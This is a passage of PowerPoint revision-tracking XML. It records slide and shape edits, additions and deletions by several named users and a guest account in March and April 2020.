        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:56:06.645" v="3727" actId="692"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="904304897" sldId="604"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:46.078" v="2802" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:spMk id="2" creationId="{466EED0B-DA85-478B-983E-42CE349D62EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:55:24.615" v="3717" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:spMk id="3" creationId="{B417FD32-F174-4F9B-AC24-75F280513A52}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:53:26.740" v="3491" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:picMk id="4" creationId="{2DEEF8E7-5619-43E0-A48C-B64C8D4EAE93}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:52:49.877" v="3479" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:picMk id="5" creationId="{A201071D-9A6A-41E9-BFE5-938E1ACE7BF3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:56:06.645" v="3727" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:picMk id="6" creationId="{3923E105-EF67-48C0-A302-A8D75289733B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:48:23.438" v="2981" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2660421503" sldId="605"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:09.391" v="2776" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:spMk id="2" creationId="{C085B568-D453-4F7E-98EE-B28A3C6FCB43}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:48:20.824" v="2980" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:spMk id="3" creationId="{19FD4F39-2C49-45C8-8E4D-4E928B3A2588}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:44:53.039" v="2379" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:picMk id="4" creationId="{25B6BA89-068C-47C6-9827-4D2661AE38CD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:44:52.462" v="2378" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:picMk id="5" creationId="{6874CF08-0AC5-4C52-AE32-1C6482CAC805}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:48:23.438" v="2981" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:picMk id="6" creationId="{C347B672-BEB8-4D38-B496-AAB7852F8125}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:36.657" v="2786" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1969071705" sldId="606"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:38.141" v="2787" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3373190787" sldId="607"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}" dt="2020-03-20T15:55:09.018" v="11" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}" dt="2020-03-20T15:52:33.330" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3392114702" sldId="592"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}" dt="2020-03-20T15:52:33.330" v="2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Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}" dt="2020-03-20T15:55:09.003" v="10" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2269361501" sldId="610"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Chuck Gardner" userId="S::chuck.gardner@cyber.org::664bb179-a73e-4a5b-94b5-5feeb32b7353" providerId="AD" clId="Web-{0E2ED7F4-A4A1-7EB7-D306-A1478A16F489}" dt="2020-03-20T15:55:09.003" v="10" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269361501" sldId="610"/>
            <ac:spMk id="3" creationId="{C2821631-6A21-443D-A6D9-C93BD9C3C198}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:51:59.332" v="195" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:49:39.503" v="2" actId="1076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2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:49:35.832" v="1" actId="1076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S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:49:39.503" v="2" actId="1076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2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:51:08.191" v="53" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3576579015" sldId="594"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:51:08.191" v="53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Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:51:58.192" v="193" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574180667" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:51:58.192" v="193" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:spMk id="3" creationId="{4BDDE3EC-F076-499C-96A3-50D98C09FDD7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:50:10.394" v="4" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4062376826" sldId="615"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{2C5ABC28-3AD3-D8E4-3BB5-E6A791A440B5}" dt="2020-03-20T15:50:10.394" v="4" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:spMk id="3" creationId="{821BC5BD-E2E6-4121-AB8D-B83154140DD6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:55:36.046" v="597" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:50:48.486" v="227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E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:50:48.486" v="227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3:44.188" v="338" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3957164049" sldId="591"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:53:44.188" v="338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45:19.567" v="150" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3392114702" sldId="592"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:45:19.567" v="150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46:03.551" v="182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E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:46:03.551" v="18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1:04.158" v="231" actId="20577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E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:51:04.158" v="231" actId="20577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0:08.205" v="206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E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:50:08.205" v="206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5:23.687" v="595" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="502917719" sldId="603"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:55:23.687" v="59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5:36.046" v="597" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="904304897" sldId="604"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:55:36.046" v="597" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:spMk id="3" creationId="{B417FD32-F174-4F9B-AC24-75F280513A52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1:35.189" v="253" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2660421503" sldId="605"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:51:35.189" v="253" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:spMk id="3" creationId="{19FD4F39-2C49-45C8-8E4D-4E928B3A2588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2:35.423" v="301" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1969071705" sldId="606"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:52:35.423" v="301" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1969071705" sldId="606"/>
            <ac:spMk id="3" creationId="{19FD4F39-2C49-45C8-8E4D-4E928B3A2588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3:30.766" v="334" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3373190787" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{E9CF5575-CA9C-5B43-06B2-0B9804F44E39}" dt="2020-03-17T03:53:30.766" v="334" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373190787" sldId="607"/>
            <ac:spMk id="3" creationId="{19FD4F39-2C49-45C8-8E4D-4E928B3A2588}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{D00FA83D-CCC4-B3A7-80A1-7DC6539F9C26}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{D00FA83D-CCC4-B3A7-80A1-7DC6539F9C26}" dt="2020-04-03T14:36:44.171" v="7" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{D00FA83D-CCC4-B3A7-80A1-7DC6539F9C26}" dt="2020-04-03T14:36:44.171" v="7" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2881646623" sldId="611"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="S::joe.macadam@cyber.org::bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="AD" clId="Web-{D00FA83D-CCC4-B3A7-80A1-7DC6539F9C26}" dt="2020-04-03T14:36:44.171" v="7" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:picMk id="4" creationId="{47330BFA-C9D2-4F93-B105-D306789D83D7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:38:42.142" v="5112" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:47:55.012" v="460" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:10:13.675" v="141" actId="14100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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:47:55.012" v="460" actId="1035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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:05:02.401" v="3094" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:10:35.765" v="154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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:05:02.401" v="309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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:38:42.142" v="5112" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="309114280" sldId="589"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:49.243" v="1453" actId="404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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:38:42.142" v="5112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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:12:24.512" v="400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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:12:24.512" v="400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Sp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:51:15.652" v="784" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3392114702" sldId="592"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:15:57.964" v="444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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:51:15.652" v="784" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="3" creationId="{FF20D8FE-5958-4695-9408-98B27A546595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:48:23.903" v="461" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="7" creationId="{6CBB69CA-79CC-4FCF-96CA-435D992B974F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:12:33.907" v="416" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:picMk id="4" creationId="{8CA071F5-23E9-44BA-A6E3-461124C369C0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:48:24.661" v="462" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:cxnSpMk id="10" creationId="{BB767213-656F-4F80-B825-98451A6C4976}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:52:19.037" v="903" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:51:24.478" v="797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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:52:19.037" v="903" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:spMk id="3" creationId="{21C25B94-29D5-48B2-A6F8-F9E7433E2123}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:52:12.548" v="901" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:spMk id="5" creationId="{D295DC8C-578D-418B-B624-DC9CEDEE303C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:52:35.174" v="916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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:52:35.174" v="916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">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:19.439" v="1397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D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:18.244" v="1395" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:18.873" v="1396" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="817173972" sldId="599"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:20.016" v="1398" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2660421503" sldId="605"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:10.693" v="1393" actId="692"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574180667" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:54:34.117" v="934" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:spMk id="2" creationId="{E0E7E501-C2CD-42FD-BCAD-E4A3E6159277}"/>
          </ac:spMkLst>
        </pc:spChg>
